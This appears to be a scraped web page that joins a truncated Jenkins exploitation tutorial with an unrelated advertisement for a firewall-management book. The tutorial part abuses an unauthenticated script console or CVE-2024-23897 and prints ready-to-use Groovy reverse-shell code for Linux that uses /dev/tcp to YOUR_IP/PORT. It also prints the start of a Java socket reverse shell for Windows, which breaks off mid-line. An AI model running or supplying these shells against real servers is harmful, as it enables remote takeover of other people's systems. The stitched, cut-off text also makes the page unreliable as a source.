Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
BEING A FIREWALL ENGINEER : AN OPERATIONAL APPROACH
A Comprehensive guide on firewall management operations and best practices
Available on Amazon.
Kindle Edition : https://www.amazon.com/dp/B07HDJDG6R
Paperback : https://www.amazon.com/dp/172374297X
Kindle Edition : https://www.amazon.com/dp/B07HDJDG6R
Paperback : https://www.amazon.com/dp/172374297X
Understand different firewall products and the Packet-flows. Hardening
and best practices of firewall management with real world example. Get
familiarize with Change management and understand how to incorporate
change management process in to firewall management operations.
This
book give you a broad overview on Firewalls, packet flows, hardening,
management & operations and the best practices followed in the
industry. Though this book is mainly intended for firewall
administrators who are in to operations, this book give a quick
introduction and comparisons of the major firewall vendors and their
products.
In this book I have covered the following topics.
•Various Job roles related to Firewalls.
•What makes you a firewall expert?
•Know the major firewall vendors and their models.
•Understand the packet flow or order of operation in each firewall. .Buy Now
•Understand the different types of firewalls.
•Understand the daily tasks of a firewall administrator
•Understand device hardening.
•Guidelines on hardening the firewalls.
•Explains major hardening standards and compliance.
•Understand Change Management process.
•Illustration on How to make a firewall change (incorporating Change management process) with a real world example.
Note: This book is not a configuration guide.